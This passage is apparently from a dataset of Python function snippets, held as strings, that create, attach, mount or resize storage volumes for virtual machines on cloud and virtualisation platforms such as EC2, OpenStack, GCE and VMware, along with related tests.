disk %s to VM %s\" %\n (self.disk_name, self.test_vm_name)\n )\n assert ll_disks.wait_for_disks_status(self.disk_name), (\n \"Disk %s is not in the expected state 'OK\" % self.disk_name\n )", "def _do_attach(self, attach_device):\n try:\n if attach_device is not None:\n log.debug(\"Attaching volume '%s' to instance '%s' as device '%s'\" %\n (self.volume_id, self.app.cloud_interface.get_instance_id(),\n attach_device))\n self.volume.attach(\n self.app.cloud_interface.get_instance_id(), attach_device)\n else:\n log.error(\"Attaching volume '%s' to instance '%s' failed because \"\n \"could not determine device.\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id()))\n return False\n except EC2ResponseError, e:\n if e.error_code == 'InvalidVolume.ZoneMismatch':\n msg = (\"Volume '{0}' is located in the wrong availability zone \"\n \"for this instance. You MUST terminate this instance \"\n \"and start a new one in zone '{1}' instead of '{2}' \"\n \"to be able to use this volume.\"\n .format(self.volume_id, self.volume.zone,\n self.app.cloud_interface.get_zone()))\n self.app.msgs.critical(msg)\n log.error(msg)\n self.fs.state = service_states.ERROR\n else:\n log.error(\"Attaching volume '%s' to instance '%s' as device '%s' failed. \"\n \"Exception: %s (%s)\" % (self.volume_id,\n self.app.cloud_interface.get_instance_id(),\n attach_device, e.message,\n e.error_code))\n return False\n return self.status", "def _attach_volume(self):\n return []", "def __mount_ebs_volume( self ):\n ebs_volume_size = self.instance_tag( 'ebs_volume_size' ) or '0'\n ebs_volume_size = int( ebs_volume_size )\n if ebs_volume_size:\n instance_name = self.instance_tag( 'Name' )\n cluster_ordinal = int( self.instance_tag( 'cluster_ordinal' ) )\n volume_name = '%s__%d' % (instance_name, cluster_ordinal)\n volume = EC2VolumeHelper( ec2=self.ec2,\n availability_zone=self.availability_zone,\n name=volume_name,\n size=ebs_volume_size,\n volume_type=\"gp2\" )\n # TODO: handle case where volume is already attached\n device_ext = '/dev/sdf'\n device = '/dev/xvdf'\n volume.attach( self.instance_id, device_ext )\n\n # Wait for inode to appear and make sure its a block device\n while True:\n try:\n assert stat.S_ISBLK( os.stat( device ).st_mode )\n break\n except OSError as e:\n if e.errno == errno.ENOENT:\n time.sleep( 1 )\n else:\n raise\n\n # Only format empty volumes\n volume_label = volume_label_hash( volume_name )\n if check_output( [ 'file', '-sL', device ] ).strip( ) == device + ': data':\n check_call( [ 'mkfs', '-t', 'ext4', device ] )\n check_call( [ 'e2label', device, volume_label ] )\n else:\n # If the volume is not empty, verify the file system label\n actual_label = check_output( [ 'e2label', device ] ).strip( )\n if actual_label != volume_label:\n raise AssertionError(\n \"Expected volume label '%s' (derived from '%s') but got '%s'\" %\n (volume_label, volume_name, actual_label) )\n current_mount_point = self.__mount_point( device )\n if current_mount_point is None:\n mkdir_p( self.persistent_dir )\n check_call( [ 'mount', device, self.persistent_dir ] )\n elif current_mount_point == self.persistent_dir:\n pass\n else:\n raise RuntimeError(\n \"Can't mount device %s on '%s' since it is already mounted on '%s'\" % (\n device, self.persistent_dir, current_mount_point) )\n else:\n # No persistent volume is attached and the root volume is off limits, so we will need\n # to place persistent data on the ephemeral volume.\n self.persistent_dir = self.ephemeral_dir", "def create(self, filesystem=None):\n if not self.size and not self.from_snapshot_id and not self.from_archive:\n log.error('Cannot add a {0} volume without a size, snapshot ID or '\n 'archive url; aborting.'.format(self.fs))\n return False\n # If creating the volume from a snaphost, get the expected volume size\n if self.from_snapshot_id and not self.volume:\n self.snapshot = self.app.cloud_interface.get_snapshot(self.from_snapshot_id)\n if not self.snapshot:\n log.error(\"Did not retrieve Snapshot object for {0}; aborting.\"\n .format(self.from_snapshot_id))\n return False\n # We need a size to be able to create a volume, so if none\n # is specified, use snapshot size\n if not self.size:\n si = self.app.cloud_interface.get_snapshot_info(self.from_snapshot_id)\n self.size = si.get('volume_size')\n # If it does not already exist, create the volume\n if self.status == volume_status.NONE:\n log.debug(\"Creating a new volume of size '%s' in zone '%s' from \"\n \"snapshot '%s' for %s.\"\n % (self.size, self.app.cloud_interface.get_zone(),\n self.from_snapshot_id, self.fs))\n self.volume = self.app.cloud_interface.create_volume(\n self.size,\n self.app.cloud_interface.get_zone(),\n snapshot=self.from_snapshot_id)\n if self.volume:\n # When creating from a snapshot in Euca, volume.size may be None\n self.size = int(self.volume.size or 0)\n log.debug(\"Created a new volume of size '%s' from snapshot '%s' \"\n \"with ID '%s' in zone '%s' for %s.\"\n % (self.size, self.from_snapshot_id, self.volume_id,\n self.app.cloud_interface.get_zone(), self.fs))\n else:\n log.warning(\"No volume object - did not create a volume?\")\n return False\n else:\n log.debug(\"Tried to create a volume for %s but it is in state '%s' \"\n \"(volume ID: %s)\" % (self.fs, self.status, self.volume_id))\n return False\n # Add tags to newly created volumes (do this outside the inital if/else\n # to ensure the tags get assigned even if using an existing volume vs.\n # creating a new one)\n self.app.cloud_interface.add_tag(\n self.volume, 'Name', self.app.config['cluster_name'])\n self.app.cloud_interface.add_tag(\n self.volume, 'bucketName', self.app.config['bucket_cluster'])\n if self.fs:\n self.app.cloud_interface.add_tag(\n self.volume, 'filesystem', self.fs.get_full_name())\n self.app.cloud_interface.add_tag(\n self.volume, 'roles', ServiceRole.to_string(self.fs.svc_roles))\n return True", "def attach_volumes(instance_id, volumes):\n if type(volumes) is not list:\n volumes = [volumes]\n for volume in volumes:\n command = 'nova volume-attach %s %s %s' % (instance_id, volume['id'],\n volume['device'])\n dest_attachment = parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])", "def assign_volume(VolumeId=None, InstanceId=None):\n pass", "def add(self):\n self.create(self.fs.name)\n # Mark a volume as 'static' if created from a snapshot\n # Note that if a volume is marked as 'static', it is assumed it\n # can be deleted upon cluster termination!\n if (ServiceRole.GALAXY_DATA not in self.fs.svc_roles and\n (self.from_snapshot_id is not None or self.from_archive is not\n None)):\n log.debug(\"Marked volume '%s' from file system '%s' as 'static'\" %\n (self.volume_id, self.fs.name))\n # FIXME: This is a major problem - any new volumes added from a snapshot\n # will be assumed 'static'. This is OK before being able to add an\n # arbitrary volume as a file system but is no good any more. The\n # problem is in automatically detecting volumes that are supposed\n # to be static and are being added automatically at startup\n if self.from_archive:\n self.fs.kind = 'volume' # Treated as a regular volume after initial extraction\n else:\n self.static = True\n self.fs.kind = 'snapshot'\n else:\n self.fs.kind = 'volume'\n if self.attach():\n us = os.path.join(self.app.path_resolver.galaxy_data, 'upload_store')\n misc.remove(us)\n log.debug(\"Volume attached, mounting {0}\".format(self.fs.mount_point))\n self.mount(self.fs.mount_point)", "def mount(fstype, export, vol_name, mountpoint, instance, options=None):\n with __manager__.get_state() as mount_state:\n mount_state.mount(fstype, export, vol_name, mountpoint, instance,\n options)", "def attach(self,\n names,\n vm):\n results = []\n for name in names:\n volume_info = self.cm.find_name(name)\n if volume_info and volume_info[0]['State'] != \"deleted\":\n vms = volume_info[0]['AttachedToVm']\n path = volume_info[0]['path']\n if vm in vms:\n Console.error(f\"{name} already attached to {vm}\")\n else:\n result = self.mount(path=f\"{path}/{name}\", vm=vm)\n mounts = result['mounts']\n if f\"{path}/{name}\" in mounts.keys():\n vms.append(vm)\n\n result = self.update_volume_after_attached_to_vm(\n info=volume_info, vms=vms)\n results.append(result)\n else:\n Console.error(\n \"volume is not existed or volume had been deleted\")\n return results[0]", "def migrate(self, **kwargs):\n volume_name = kwargs['NAME']\n vm = kwargs['vm']\n volume_info = self.cm.find_name(name=volume_name)\n volume_attached_vm = volume_info[0]['AttachedToVm']\n vm_info = Shell.run(f\"multipass info {vm} --format=json\")\n vm_info = json.loads(vm_info)\n vm_status = vm_info[\"info\"][vm]['state']\n if vm_status == 'running':\n param = {'NAME': volume_name}\n self.detach(**param)\n self.attach(**param, vm=vm)\n try:\n for old_vm in volume_attached_vm:\n volume_info[0]['AttachedToVm'].remove(old_vm)\n except:\n pass\n volume_info[0]['AttachedToVm'].append(vm)\n return volume_info", "def _attach_volume_to_sg(self, context, volume_id, sg_client):\n @utils.synchronized(sg_client.instance)\n def _do_attach_volume(context, volume_id, sg_client):\n try:\n old_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"old devices: %s\"), old_devices)\n nova_client = self._create_nova_client(self.admin_context)\n nova_client.volumes.create_server_volume(sg_client.instance,\n volume_id)\n cinder_client = self._create_cinder_client(context)\n cinder_volume = self._wait_cinder_volume_status(\n cinder_client, volume_id, 'in-use')\n if cinder_volume.status != 'in-use':\n raise Exception(_LE(\"attach volume to sg failed\"))\n new_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"new devices: %s\"), new_devices)\n added_devices = [device for device in new_devices\n if device not in old_devices]\n return added_devices[0]\n except Exception as err:\n LOG.error(err)\n raise exception.AttachSGFailed(reason=err)\n\n return _do_attach_volume(context, volume_id, sg_client)", "def mount_root_vm(self):\n print \"montage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"mount /dev/%s/root-%s %s\" % (vgname, name_vm_dest, self.rep_vhosts_vm))", "def create_volume(self, instance_id):\n user, instance = _get_user_and_instance(self.girder_client, instance_id)\n tale = self.girder_client.get('/tale/{taleId}'.format(**instance))\n\n self.job_manager.updateProgress(\n message='Creating volume', total=CREATE_VOLUME_STEP_TOTAL,\n current=1, forceFlush=True)\n\n vol_name = \"%s_%s_%s\" % (tale['_id'], user['login'], new_user(6))\n fs_sidecar = FSContainer.start_container(vol_name)\n payload = {\n \"mounts\": [\n {\n \"type\": \"data\",\n \"protocol\": \"girderfs\",\n \"location\": \"data\",\n },\n {\n \"type\": \"home\",\n \"protocol\": \"bind\",\n \"location\": \"home\",\n },\n {\n \"type\": \"workspace\",\n \"protocol\": \"bind\",\n \"location\": \"workspace\",\n },\n {\n \"type\": \"versions\",\n \"protocol\": \"girderfs\",\n \"location\": \"versions\",\n },\n {\n \"type\": \"runs\",\n \"protocol\": \"girderfs\",\n \"location\": \"runs\",\n },\n ],\n \"taleId\": tale[\"_id\"],\n \"userId\": user[\"_id\"],\n \"girderApiUrl\": GIRDER_API_URL,\n \"girderApiKey\": _get_api_key(self.girder_client),\n \"root\": vol_name,\n }\n FSContainer.mount(fs_sidecar, payload)\n self.job_manager.updateProgress(\n message='Volume created', total=CREATE_VOLUME_STEP_TOTAL,\n current=CREATE_VOLUME_STEP_TOTAL, forceFlush=True)\n print(\"WT Filesystem created successfully.\")\n\n cli = docker.from_env()\n return dict(\n nodeId=cli.info()['Swarm']['NodeID'],\n fscontainerId=fs_sidecar.id,\n volumeName=vol_name,\n instanceId=instance_id,\n taleId=tale[\"_id\"],\n )", "def attachDisk(\n positive, alias, vm_name, active=True, read_only=False, disk_id=None,\n interface='virtio', bootable=None,\n):\n if disk_id:\n name = disk_id\n attribute = 'id'\n else:\n name = alias\n attribute = 'name'\n disk_object = get_disk_obj(name, attribute)\n # This is only needed because for legacy reason we also want to modify\n # the read_only property when we attach a disk\n # Also for attaching a disk the active parameter is pass inside the disk\n # object\n updated_disk = _prepareDiskObject(\n id=disk_object.get_id(), read_only=read_only\n )\n vm_disks = getObjDisks(vm_name)\n logger.info(\"Attaching disk %s to vm %s\", alias, vm_name)\n disk_attachment = prepare_disk_attachment_object(\n updated_disk.get_id(), interface=interface, bootable=bootable,\n disk=updated_disk, active=active\n )\n return DISK_ATTACHMENTS_API.create(\n disk_attachment, positive, collection=vm_disks\n )[1]", "def extend_volume(self, volume, new_size):\n LOG.info('Extending volume: %(id)s New size: %(size)s GB',\n {'id': volume['id'], 'size': new_size})\n nfs_share = volume['provider_location']\n nms = self.share2nms[nfs_share]\n volume_path = self.remote_path(volume)\n if getattr(self.configuration,\n self.driver_prefix + '_sparsed_volumes'):\n self._create_sparsed_file(nms, volume_path, new_size)\n else:\n block_size_mb = 1\n block_count = ((new_size - volume['size']) * units.Gi /\n (block_size_mb * units.Mi))\n\n nms.appliance.execute(\n 'dd if=/dev/zero seek=%(seek)d of=%(path)s'\n ' bs=%(bs)dM count=%(count)d' % {\n 'seek': volume['size'] * units.Gi / block_size_mb,\n 'path': volume_path,\n 'bs': block_size_mb,\n 'count': block_count\n }\n )", "def attach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables from global.ini for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch mount options from global.ini\n try:\n mount_options = connectionData[\"mountoptions\"]\n except:\n mount_options = \"\"\n\n # fetch fencing options from global.ini\n try:\n fencing = connectionData[\"fencing\"]\n except:\n fencing = \"\"\n\n # fetch the host which currently owns the disk & the file path\n pdhost = self.get_pd_host(conn, pd, zone)\n path = storage.get(\"path\")\n\n # check if the require disk is already attached somewhere. If it is, detach it and fence the old host\n if pdhost == HOSTNAME:\n self.tracer.info(\"disk %s is already attached to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n continue\n elif pdhost != \"\":\n self.tracer.info(\"unable to attach %s to %s(%s) as it is still attached to %s\" % (pd, HOSTNAME, zone, pdhost))\n self.detach_pd(conn, pdhost, pd)\n if fencing.lower() == \"enabled\" or fencing.lower() == \"true\" or fencing.lower() == \"yes\":\n self.fence(conn, pdhost)\n\n # prepare payload for API call\n pdurl = self.zonal_url(zone, \"disks\", pd)\n body = {\n \"deviceName\": pd,\n \"source\": pdurl\n }\n\n # send API call to disconnect disks\n self.tracer.info(\"attempting to attach %s to %s(%s)\" % (pd, HOSTNAME, zone))\n operation = conn.instances().attachDisk(project=PROJECT, zone=zone, instance=HOSTNAME, body=body).execute()\n self.wait_for_operation(conn, operation, zone)\n\n # check if disk is attached and if so, mount the volumes\n if self.get_pd_host(conn, pd, zone) == HOSTNAME:\n self.tracer.info(\"successfully attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n self.mount(dev, path, mount_options)\n else:\n raise Exception(\"failed to attached %s to %s(%s)\" % (pd, HOSTNAME, zone))\n\n # tell HANA is all good and to continue the load process\n return 0", "def update_volume_after_attached_to_vm(self, info, vms):\n path = info[0]['path']\n path_list = path.split(sep='/')\n machine_path_list = [\"~\", \"Home\"]\n machine_path_list.extend(path_list[3:])\n info[0]['machine_path'] = \"/\".join(machine_path_list)\n info[0]['AttachedToVm'] = vms\n info[0]['State'] = 'in-use'\n info[0]['time'] = datetime.datetime.now()\n return info", "def test_06_migrate_vm_live_attach_disk(self):\n \n global vm\n global data_disk_1\n data_disk_1 = self.helper.create_custom_disk(\n self.apiclient,\n {\"diskname\":\"StorPoolDisk\" },\n zoneid=self.zone.id,\n size = 5,\n miniops = 2000,\n maxiops = 5000,\n account=self.account.name,\n domainid=self.account.domainid,\n diskofferingid=self.disk_offerings.id,\n )\n\n self.debug(\"Created volume with ID: %s\" % data_disk_1.id)\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n data_disk_1\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient, vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n\n self.virtual_machine_live_migration_1.attach_volume(\n self.apiclient,\n self.volume\n )\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)\n vm = self.helper.migrateVm(self.apiclient, self.virtual_machine_live_migration_1, destinationHost)\n\n destinationHost, vol_list = self.helper.get_destination_pools_hosts(self.apiclient,vm, self.host)\n for v in vol_list:\n self.helper.check_storpool_volume_iops(self.spapi, v)", "def test_volume_extend(self, volume, volumes_steps):\n volumes_steps.extend_volume(volume.name)", "def attach_device(self):\n if self.volume:\n self.volume.update()\n return self.volume.attach_data.device\n else:\n return None", "def add_volume(self, size=100):\n tfvars_file = \"terraform.tfvars.json\"\n with open(os.path.join(self.cluster_path, tfvars_file)) as f:\n tfvars = json.load(f)\n\n cluster_id = tfvars['cluster_id']\n worker_pattern = f'{cluster_id}-worker*'\n logger.info(f'Worker pattern: {worker_pattern}')\n self.create_ebs_volumes(worker_pattern, size)", "def test_attach_attached_volume_to_same_server(self):\n server, validation_resources = self._create_server()\n volume = self.create_volume()\n\n self.attach_volume(server, volume)\n\n self.assertRaises(lib_exc.BadRequest,\n self.attach_volume, server, volume)", "def add_volume(self, volume: 'Volume'):\n self.volumes.append(volume)", "def _AttachDisk(self, idx, params, _):\n uuid = params.get(\"uuid\", None)\n name = params.get(constants.IDISK_NAME, None)\n\n disk = self.GenericGetDiskInfo(uuid, name)\n\n # Rename disk before attaching (if disk is filebased)\n if disk.dev_type in constants.DTS_INSTANCE_DEPENDENT_PATH:\n # Add disk size/mode, else GenerateDiskTemplate will not work.\n params[constants.IDISK_SIZE] = disk.size\n params[constants.IDISK_MODE] = str(disk.mode)\n dummy_disk = self._GenerateDiskTemplateWrapper(idx, disk.dev_type, params)\n new_logical_id = dummy_disk.logical_id\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(disk, new_logical_id)])\n result.Raise(\"Failed before attach\")\n self.cfg.SetDiskLogicalID(disk.uuid, new_logical_id)\n disk.logical_id = new_logical_id\n\n # Attach disk to instance\n self.cfg.AttachInstanceDisk(self.instance.uuid, disk.uuid, idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n changes = [\n (\"disk/%d\" % idx,\n \"attach:size=%s,mode=%s\" % (disk.size, disk.mode)),\n ]\n\n disks_ok, _, payloads = AssembleInstanceDisks(self, self.instance,\n disks=[disk])\n if not disks_ok:\n changes.append((\"disk/%d\" % idx, \"assemble:failed\"))\n return disk, changes\n\n if self.op.hotplug:\n _, link_name, uri = payloads[0]\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_DISK,\n disk, (link_name, uri), idx)\n changes.append((\"disk/%d\" % idx, msg))\n\n return (disk, changes)", "def fusion_api_create_storage_volume(self, body, api=None, headers=None):\n return self.volume.create(body=body, api=api, headers=headers)", "def add_volume(self, oid, volume_id):\n data = {\n \"volumeAttachment\": {\n \"volumeId\": volume_id,\n }\n }\n path = '/servers/%s/os-volume_attachments' % oid\n res = self.client.call(path, 'POST', data=json.dumps(data), \n token=self.manager.identity.token)\n self.logger.debug('Add volume %s to server %s: %s' % \n (volume_id, oid, truncate(res)))\n return res[0]['volumeAttachment']", "def test_attach_attached_volume_to_different_server(self):\n server1, validation_resources = self._create_server()\n volume = self.create_volume()\n\n self.attach_volume(server1, volume)\n\n # Create server2 and attach in-use volume\n server2, validation_resources = self._create_server()\n self.assertRaises(lib_exc.BadRequest,\n self.attach_volume, server2, volume)", "def _mount_gluster_vol(self, mount_path, ensure=False):\n self._execute('mkdir', '-p', mount_path)\n command = ['mount', '-t', 'glusterfs', self.gluster_manager.export,\n mount_path]\n self._do_mount(command, ensure)", "def vm_volume(self, vm_volume):\n\n self._vm_volume = vm_volume", "def attach_disk_to_vm(self, vm_ref, instance_name,\n adapter_type, disk_type, vmdk_path=None,\n disk_size=None, linked_clone=False,\n controller_key=None, unit_number=None,\n device_name=None):\n client_factory = self._session._get_vim().client.factory\n vmdk_attach_config_spec = vm_util.get_vmdk_attach_config_spec(\n client_factory, adapter_type, disk_type,\n vmdk_path, disk_size, linked_clone,\n controller_key, unit_number, device_name)\n\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_attach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())", "def _create_volume(self):\n vol = {}\n vol['size'] = 1\n vol['availability_zone'] = 'test'\n return db.volume_create(self.context, vol)['id']", "def create_disk(self, disk):\n spec = {\n 'new_vmdk': {\n # Convert from mebibytes to bytes because VMDK is specified in bytes\n 'capacity': 1024\n * 1024\n * disk.size,\n }\n }\n\n try:\n backend_id = self.client.create_disk(disk.vm.backend_id, spec)\n except VMwareError as e:\n raise VMwareBackendError(e)\n else:\n disk.backend_id = backend_id\n disk.save(update_fields=['backend_id'])\n signals.vm_updated.send(self.__class__, vm=disk.vm)\n return disk", "def create_volume(self, volume):\n LOG.debug('SPDK create volume')\n\n return self._create_volume(volume)", "def createDisk(instanceID, devicePrefix, raidDevice, numVolumes, volumeSize,\n mountPath, namePrefix):\n assert numVolumes > 0\n assert 0 < volumeSize < 1000\n if numVolumes > 1:\n assert raidDevice is not None\n\n print 'Getting instance information.'\n ec2 = EC2Connection()\n instance = ec2.get_all_instances([instanceID])[0].instances[0]\n zone = instance.placement\n\n volumes = []\n for i in range(numVolumes):\n device = devicePrefix + str(i + 1)\n print 'Creating volume for', device\n volume = ec2.create_volume(volumeSize, zone)\n volume.attach(instanceID, device)\n volumes.append(volume)\n if namePrefix is not None:\n volume.add_tag(\n 'Name', '{0} ({1})'.format(namePrefix, device.split('/')[-1]))\n\n pendingVolumes = set(volumes)\n while pendingVolumes:\n print 'Attaching volumes.', len(pendingVolumes), 'remaining.'\n time.sleep(1)\n for volume in list(pendingVolumes):\n try:\n volume.update()\n except EC2ResponseError:\n print 'Response error.'\n print \"Don't panic, this usually happens, trying again.\"\n if volume.attachment_state() == u'attached':\n pendingVolumes.remove(volume)\n\n print 'All volumes attached: ', ''.join(volume.id for volume in volumes)\n\n env.host_string = instance.dns_name\n\n if len(volumes) > 1:\n sudo('DEBIAN_FRONTEND=noninteractive apt-get install -y mdadm')\n print 'Creating RAID array.'\n devices = [volume.attach_data.device.replace('/dev/sd', '/dev/xvd')\n for volume in volumes]\n devices = ' '.join(devices)\n sudo('mdadm --create {0} --level raid10 --auto=yes --assume-clean '\n '--raid-devices {1} {2}'.format(raidDevice, numVolumes, devices))\n sudo('echo DEVICE {0} >> /etc/mdadm/mdadm.conf'.format(devices))\n sudo('mdadm --detail --scan | grep {0} | '\n 'sudo tee -a /etc/mdadm/mdadm.conf'.format(raidDevice))\n\n # Tell the kernel to use the specified configurationg, otherwise it\n # will use something like /dev/md127\n sudo('update-initramfs -u')\n\n device = raidDevice\n else:\n device = volumes[0].attach_data.device.replace('/dev/sd', '/dev/xvd')\n\n print 'Formating device.'\n sudo('mkfs.ext4 {0}'.format(device))\n sudo('echo \"{0} {1} ext4 noatime 0 0\" >> /etc/fstab'.format(device,\n mountPath))\n\n print 'Mounting device.'\n sudo('mkdir -p {0}'.format(mountPath))\n sudo('mount %s' % mountPath)\n print 'Success.'", "def create_volume(self, volume):\n # Generate App Instance, Storage Instance and Volume\n # Volume ID will be used as the App Instance Name\n # Storage Instance and Volumes will have standard names\n policies = self._get_policies_for_resource(volume)\n num_replicas = int(policies['replica_count'])\n storage_name = policies['default_storage_name']\n volume_name = policies['default_volume_name']\n\n app_params = (\n {\n 'create_mode': \"openstack\",\n 'uuid': str(volume['id']),\n 'name': _get_name(volume['id']),\n 'access_control_mode': 'deny_all',\n 'storage_instances': {\n storage_name: {\n 'name': storage_name,\n 'volumes': {\n volume_name: {\n 'name': volume_name,\n 'size': volume['size'],\n 'replica_count': num_replicas,\n 'snapshot_policies': {\n }\n }\n }\n }\n }\n })\n self._create_resource(volume, URL_TEMPLATES['ai'](), body=app_params)", "def test_finish_resize_with_volumes(self):\n\n # create instance\n instance = self._create_fake_instance_obj()\n request_spec = objects.RequestSpec()\n\n # create volume\n volume = {'instance_uuid': None,\n 'device_name': None,\n 'id': uuids.volume,\n 'size': 200,\n 'attach_status': 'detached'}\n bdm = objects.BlockDeviceMapping(\n **{'context': self.context,\n 'source_type': 'volume',\n 'destination_type': 'volume',\n 'volume_id': uuids.volume,\n 'instance_uuid': instance['uuid'],\n 'device_name': '/dev/vdc'})\n bdm.create()\n\n # stub out volume attach\n def fake_volume_get(self, context, volume_id, microversion=None):\n return volume\n self.stub_out('nova.volume.cinder.API.get', fake_volume_get)\n\n def fake_volume_check_availability_zone(self, context,\n volume_id, instance):\n pass\n self.stub_out('nova.volume.cinder.API.check_availability_zone',\n fake_volume_check_availability_zone)\n\n def fake_get_volume_encryption_metadata(self, context, volume_id):\n return {}\n self.stub_out('nova.volume.cinder.API.get_volume_encryption_metadata',\n fake_get_volume_encryption_metadata)\n\n orig_connection_data = {\n 'target_discovered': True,\n 'target_iqn': 'iqn.2010-10.org.openstack:%s.1' % uuids.volume_id,\n 'target_portal': '127.0.0.0.1:3260',\n 'volume_id': uuids.volume_id,\n }\n connection_info = {\n 'driver_volume_type': 'iscsi',\n 'data': orig_connection_data,\n }\n\n def fake_init_conn(self, context, volume_id, session):\n return connection_info\n self.stub_out('nova.volume.cinder.API.initialize_connection',\n fake_init_conn)\n\n def fake_attach(self, context, volume_id, instance_uuid, device_name,\n mode='rw'):\n volume['instance_uuid'] = instance_uuid\n volume['device_name'] = device_name\n self.stub_out('nova.volume.cinder.API.attach', fake_attach)\n\n # stub out virt driver attach\n def fake_get_volume_connector(*args, **kwargs):\n return {}\n self.stub_out('nova.virt.fake.FakeDriver.get_volume_connector',\n fake_get_volume_connector)\n\n def fake_attach_volume(*args, **kwargs):\n pass\n self.stub_out('nova.virt.fake.FakeDriver.attach_volume',\n fake_attach_volume)\n\n # attach volume to instance\n self.compute.attach_volume(self.context, instance, bdm)\n\n # assert volume attached correctly\n self.assertEqual(volume['device_name'], '/dev/vdc')\n disk_info = db.block_device_mapping_get_all_by_instance(\n self.context, instance.uuid)\n self.assertEqual(len(disk_info), 1)\n for bdm in disk_info:\n self.assertEqual(bdm['device_name'], volume['device_name'])\n self.assertEqual(bdm['connection_info'],\n jsonutils.dumps(connection_info))\n\n # begin resize\n flavor = self.default_flavor\n instance.task_state = task_states.RESIZE_PREP\n instance.save()\n self.compute.prep_resize(self.context, instance=instance,\n flavor=flavor,\n image={}, request_spec=request_spec,\n filter_properties={}, node=None,\n clean_shutdown=True, migration=None,\n host_list=[])\n\n # fake out detach for prep_resize (and later terminate)\n def fake_terminate_connection(self, context, volume, connector):\n connection_info['data'] = None\n self.stub_out('nova.volume.cinder.API.terminate_connection',\n fake_terminate_connection)\n\n migration = objects.Migration.get_by_instance_and_status(\n self.context.elevated(),\n instance.uuid, 'pre-migrating')\n self.compute.resize_instance(self.context, instance=instance,\n migration=migration, image={},\n # TODO(stephenfin): Why a JSON string?\n flavor=jsonutils.to_primitive(flavor),\n clean_shutdown=True, request_spec=request_spec)\n\n # assert bdm is unchanged\n disk_info = db.block_device_mapping_get_all_by_instance(\n self.context, instance.uuid)\n self.assertEqual(len(disk_info), 1)\n for bdm in disk_info:\n self.assertEqual(bdm['device_name'], volume['device_name'])\n cached_connection_info = jsonutils.loads(bdm['connection_info'])\n self.assertEqual(cached_connection_info['data'],\n orig_connection_data)\n # but connection was terminated\n self.assertIsNone(connection_info['data'])\n\n # stub out virt driver finish_migration\n def fake(*args, **kwargs):\n pass\n self.stub_out('nova.virt.fake.FakeDriver.finish_migration', fake)\n\n instance.task_state = task_states.RESIZE_MIGRATED\n instance.save()\n\n # new initialize connection\n new_connection_data = dict(orig_connection_data)\n new_iqn = 'iqn.2010-10.org.openstack:%s.2' % uuids.volume_id,\n new_connection_data['target_iqn'] = new_iqn\n\n def fake_init_conn_with_data(self, context, volume, session):\n connection_info['data'] = new_connection_data\n return connection_info\n self.stub_out('nova.volume.cinder.API.initialize_connection',\n fake_init_conn_with_data)\n\n self.compute.finish_resize(self.context,\n migration=migration,\n disk_info={}, image={}, instance=instance,\n request_spec=request_spec)\n\n # assert volume attached correctly\n disk_info = db.block_device_mapping_get_all_by_instance(\n self.context, instance['uuid'])\n self.assertEqual(len(disk_info), 1)\n for bdm in disk_info:\n self.assertEqual(bdm['connection_info'],\n jsonutils.dumps(connection_info))\n\n # stub out detach\n def fake_detach(self, context, volume_uuid):\n volume['device_path'] = None\n volume['instance_uuid'] = None\n self.stub_out('nova.volume.cinder.API.detach', fake_detach)\n\n # clean up\n self.compute.terminate_instance(self.context, instance, [])", "def update_volume_after_detach(self, info, vms):\n info[0]['AttachedToVm'] = vms\n if len(vms) == 0:\n info[0]['machine_path'] = None\n info[0]['State'] = 'available'\n info[0]['time'] = datetime.datetime.now()\n return info", "def mount(self, fstype, export, vol_name, mountpoint, instance, options):\n\n # NOTE(mdbooth): mount() may currently be called multiple times for a\n # single attachment. Any operation which calls\n # LibvirtDriver._hard_reboot will re-attach volumes which are probably\n # already attached, resulting in multiple mount calls.\n\n LOG.debug('_HostMountState.mount(fstype=%(fstype)s, '\n 'export=%(export)s, vol_name=%(vol_name)s, %(mountpoint)s, '\n 'options=%(options)s) generation %(gen)s',\n {'fstype': fstype, 'export': export, 'vol_name': vol_name,\n 'mountpoint': mountpoint, 'options': options,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n if os.path.ismount(mountpoint):\n LOG.debug(('Mounting %(mountpoint)s generation %(gen)s, '\n 'mountpoint already mounted'),\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n else:\n LOG.debug('Mounting %(mountpoint)s generation %(gen)s',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)\n\n fileutils.ensure_tree(mountpoint)\n\n try:\n nova.privsep.fs.mount(fstype, export, mountpoint, options)\n except 